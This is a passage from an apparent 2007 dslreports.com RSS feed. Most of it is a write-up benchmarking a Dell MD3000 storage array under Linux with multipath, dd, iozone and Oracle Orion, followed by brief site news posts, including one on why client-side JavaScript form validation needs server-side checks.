3600188b00040945c000024b346e14eb1dm-1 DELL    ,MD3000 &#91;size=50G&#93;&#91;features=1 queue_if_no_path&#93;&#91;hwhandler=1 rdac&#93; \_ round-robin 0 &#91;prio=3&#93;&#91;active&#93;  \_ 2:0:0:1  sdf 8:80  &#91;active&#93;&#91;ready&#93; \_ round-robin 0 &#91;prio=0&#93;&#91;enabled&#93;  \_ 1:0:0:1  sdc 8:32  &#91;active&#93;&#91;ghost&#93; 3600188b00046e0290000638e46e14f64dm-2 DELL    ,MD3000 &#91;size=50G&#93;&#91;features=1 queue_if_no_path&#93;&#91;hwhandler=1 rdac&#93; \_ round-robin 0 &#91;prio=0&#93;&#91;enabled&#93;  \_ 2:0:0:0  sde 8:64  &#91;active&#93;&#91;ghost&#93; \_ round-robin 0 &#91;prio=3&#93;&#91;active&#93;  \_ 1:0:0:0  sdb 8:16  &#91;active&#93;&#91;ready&#93; </span></pre></div> <br>You can see that I setup two LUNs, one mapped through HBA #1 with a backup through HBA #2, and the other the reverse. The hot-standby paths are called "Ghosts" by multipath. If I joined these two LUNs up via LVM2 or mdadm (linux software raid) then in theory I am load balancing between the two HBAs. If a single "path" to the storage array fails (HBA, cable or MD3000 controller failure) then one dm-N device moves to its buddy on the other HBA and we <i>should</i> still be in business. <br> <br>Note that if one attempts to access the array via the Ghost devices, or actually has a path failure, and the Ghost devices are accessed then the MD3000 will report via the management console that it is in a "non-optimal" state because a LUN moved from its "preferred controller" to the backup controller. You can trigger this simply by using dd to read from a Ghost device. <br> <br><small>Note: if you do not install a multipath solution and put two cables from the host to the MD3000 you will see two LUNs (sd? devices). If you try to use both at the same time, the controllers will thrash, moving the disk array back and forth from slot 0 to slot 1 trying to keep up with your access pattern and performance will be awful. Don't ask how I figured this out.</small> <br> <br><div class="wiki"><h3>Benchmarking Introduction</h3></div>So it is all setup, how fast is it? <br> <br>I played around with benchmarking this thing in a number of different ways. I've used software raid to stripe md0 across dm-1 and dm-2 (hoping to see better throughput when both HBAs are teamed), I've tried LVM2 instead of software raid. I've used the underlying devices directly, with and without partitions, and also tried with Ext3 and XFS. In general the more layers the slower things become. For instance, Ext3 on top of LVM2 on top of dm-N on top of sd? might be 20% slower than just raw access to /dev/sdX <br> <br>Benchmarking tools I tried varied from simple dd for sequential write and read. hdparm -t for sequential non buffered read, "seeker" (see below) for random single block IO, iozone for a grid of data and Oracle "orion" for a simulation of database workloads. <br> <br>When running any benchmark you have to be aware of the chain of cache in use for the test. There are two possible caches of concern: the physical memory of the machine running the test & the cache on the raid controllers inside the MD3000 (512mb, supposedly, although it isn't clear if this is 256mb per controller or what). There is also probably a small individual per-drive cache but that would be overwhelmed by the other caches. <br> <br>In order to avoid testing cache speed instead of I/O array speed I made sure that the hosts were rebooted with mem=768m which means they have minimal memory free for blockio cache. The Orion benchmark tool can take into account an amount of cache before it runs - it fills the cache with random data before performance measurements start - so I took advantage of that flag to kill the MD3000 cache. Other than that I basically tried to make sure the tests involved many times the physical available memory of the host. <br> <br>It is interesting to note that hdparm -t is nearly useless for this MD3000 because although it avoids any host cache it can't avoid the 256mb controller cache. hdparm -t can show the speed of an MD3000 LUN is 300mb/sec. (pretty much the speed of one SAS cable). <br> <br><div class="wiki"><h3>The MD3000 "read" cache</h3></div>It is possible to disable the 'read' cache on a per LUN basis. I've seen written that read caches on external storage units should almost always be disabled because you want to reserve as much cache space as possible for non-blocking write operations. The read cache can be set with a SMcli script which is fed to the SMcli utility: <br> <br><div class="code"><pre><span class="codetext"> set virtualDisk&#91;"1"&#93; readCacheEnabled=true readAheadMultiplier=1; </span></pre></div> <br>Setting the cache via the gui management interface is not possible. <br> <br>My conclusions so far are that for throughput tests, disabling the readCache created too big an impact. Performance on long sequential reads dropped remarkably without a readCache. This was unexpected (how can a tiny 256mb cache help with reading 8gig of data sequentially?) unless the readCache is helping the controller modules read ahead using multiple drives in the disk group, and disabling the cache crimps that ability. So I left the readCache enabled. <br> <br><div class="wiki"><h3>Total throughput tests</h3></div>The unit did not perform to theoretical performance with any total throughput tests involving all drives. With 14 drives (7 unique and 7 more ready with duplicate data) total read performance could, theoretically, approach 80x14 = over one gigabyte a second! With a single SAS card and a JBOD array there is certainly evidence of <a href="http://oss.sgi.com/archives/xfs/2007-03/msg00154.html">this performance</A> under linux 2.6. Dual HBA cards and/or two sas cables should support 600mb/sec to the host. <br> <br>Unfortunately the fastest I could get dd, or iozone to work was about 280mb/sec in one direction. By combining two LUNs using software raid0, to combine controllers, speed rose to 370mb/sec for sequential read. <br> <br>Orion reported over 400mb/sec total throughput with a mix of read and writes. IOzone would typically report around 300mb/sec seq write and a little more seq read. <br> <br>By mixing dd out and in, three LUNs, and two disk groups total, throughput grew close to 600mb/sec. Perhaps with further experimentation it would be possible to determine what size disk group is optimal, and what mix of work generates the maximum total throughput. <br> <br><div class="wiki"><h3>Single block random reads</h3></div>Using the <A HREF="http://www.linuxinsight.com/how_fast_is_your_disk.html">seeker.c</A> random seek/read utility, modified to use 48 bit random numbers seeded correctly (not from time in seconds), and run in parallel 60 times or more, I could push the enclosure to about 6000 IOPs/second at which point adding more work just increased latency with no increase in total IOs per second (reading the IOs from iostat). I think this result more correctly reflects the speed of which a 14 disk LUN can work than did the throughput tests. A single SAS drive can do only a few hundred IO operations per second (depends on mainly on the drive's average seek time). <br> <br><div class="wiki"><h3>Oracle 'Orion' benchmark</h3></div>The <A HREF="http://download.oracle.com/otn/utilities_drivers/orion/Orion_Users_Guide.pdf">Orion manual is here</A>. <br>Orion using a 5% write 95% read mix, generated a matrix of results which I include below in a spreadsheet. Scroll the iframe right to see the results graph. Worryingly, however, on <i>both</i> hosts the full benchmark hard-locked (no kernel panic) the machine about 3/4 the way through the 3+ hour run. <br> <br><center><iframe align=center width='500' height='300' frameborder='0' src='http://spreadsheets.google.com/pub?key=p2LxIsb-WRj0gf_37aVGyMw&output=html&widget=true'> <br></iframe></center> <br> <br>The spreadsheet has two tabs, one for MB/sec the other for IOPs. The matrix of results in the first tab represents a mix of small tasks and large tasks. With many small tasks and no large tasks, total throughput rises more slowly as workload increases (the bottom curve). With all large tasks and no small tasks (top curve), total throughput looks like it will plateau around 400mb/sec as workload increases. <br> <br>The orion command line is using two LUNs as though they were striped together in a single volume (-simulate raid0). The two LUNs used are not shown, they are listed in a config file that is created before orion runs. <br> <br>Other Resources: <br><ul><li><A HREF="http://spamaps.org/raidtests.php">Headache inducing comparisons of software and hardware raid and filesystem types</A></li><li><A href="http://www.redbooks.ibm.com/redbooks/pdfs/sg246363.pdf">IBM Redbook on performance tuning of DS4100 external storage units</A></li></ul> <br>Note: it appears to me that the MD3000 uses the same controllers as the IBM model DS4100. The same SMcli utility and script, same SMagent/SMmonitor utilities, same controller memory! <br> <br>Page 4 of the IBM manual gives the performance characteristics of the DS4100 that Dell do not: <br>IOPS from cache: 70k <br>IOPS from disk: 10k <br>Disk through-put: 485MB/sec (although DS4100 only supported slow SATA drives) <br> <br>You can pick up fully populated (SATA) DS4100s on ebay for $5k, retail was $21k. Pictures of the rear reveals a very similar controller arrangement of ports. <br> <br><div class="wiki"><h3>Conclusion</h3></div>Well, I am rather miffed that the MD3000 is pimped on the Dell site as a state-of-the-art (albeit lower-end) modular storage array but is actually an IBM DS4100 in dell drag - very "End Of Life" gear, no? <br> <br>Documentation is appalling (the IBM manual is very good, however. Shame Dell didn't copy that as well). There is much more information on tuning the enclosure from IBM, which is also providing the RDAC kernel module, although IBM information is for their DS4100 only. <br> <br>Performance is adequate for the dollars (we bought ours on ebay as reconditioned equipment) but the controller modules are clearly not capable of driving 15k SAS drives to their limit, and the controller cache memory dates from an era where 1gb of host memory was a big deal!<br><br><a href="http://www.dslreports.com/shownews/Benchmarking-the-MD3000-powervault-under-linux-87401">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Benchmarking-the-MD3000-powervault-under-linux-87401</guid>
<pubDate>Sun, 09 Sep 2007 20:53:44 EDT</pubDate>
</item>
<item>
<title>Javascript form Live Validation - </title>
<description><![CDATA[<p>Today's example of YACJL (Yet Another Cool JavaScript Library) is "as you type": <A HREF="http://www.livevalidation.com/examples#exampleFormat">form validation</A>. Finally! a way to make sure your customers enter stuff exactly the way you want them to! <br> <br>But wait. You still need all the same validation on the back end, on your server. And until server-side JavaScript launches, done differently. Anyone can POST any data they like to the forms of your app - no matter how much guard JavaScript you load into your pages. So now you have two sets of validation that are almost certainly not going to match exactly. Hopefully the server-side one is tougher. <br> <br>Oddly, the documentation makes no mention of the trap for the unwary. In fact it even suggests you don't have to worry about it: <br><div class="bquote">This is useful for validating everything in a form when it is submitted. The return value of this can be used as a return value for the onsubmit event, <i>to stop the form from submitting if any fail</i>. The messages of the LiveValidation object will be displayed as if you have typed them in.</div> <br><a href="http://www.dslreports.com/shownews/Javascript-form-Live-Validation-87304">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Javascript-form-Live-Validation-87304</guid>
<pubDate>Thu, 06 Sep 2007 09:47:09 EDT</pubDate>
</item>
<item>
<title>Customer Service - </title>
<description><![CDATA[<p>This is part of our site "feedback" form. <br> att=1199407,c,400 <br>This is some feedback we got: <br> att=1199408,c,400 <br>Things that make you go .. hmm ..<br><a href="http://www.dslreports.com/shownews/Customer-Service-86470">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Customer-Service-86470</guid>
<pubDate>Thu, 09 Aug 2007 00:03:05 EDT</pubDate>
</item>
<item>
<title>Reviews and Speed Stat formats - </title>
<description><![CDATA[<p>The "<A HREF="/reviews">Reviews</A>" tab has been improved (I think), as well as showing an interesting stat on the relative frequency of good/indifferent/bad reviews per week. It also allows easy selection of reviews by entry of a single company name, and gives the same stats. <br> <br>The "<A HREF="/archive">speed test stats</A>" page has been improved to show just ISP name (not domain name), clicking on that name fetches the speed records for all known (to us) associated domains. Other minor format changes have been made as well. (You can still enter a single domain name to get a results graph).<br><a href="http://www.dslreports.com/shownews/Reviews-and-Speed-Stat-formats-86213">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Reviews-and-Speed-Stat-formats-86213</guid>
<pubDate>Mon, 30 Jul 2007 20:56:57 EDT</pubDate>
</item>
<item>
<title>Reviews format - </title>
<description><![CDATA[<p>I cleaned up the review format a little and added a button to make it a little more obvious how you can edit YOUR review. <br> att=1194148 <br><a href="http://www.dslreports.com/shownews/Reviews-format-86133">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Reviews-format-86133</guid>
<pubDate>Fri, 27 Jul 2007 18:12:06 EDT</pubDate>
</item>
</channel>
</rss>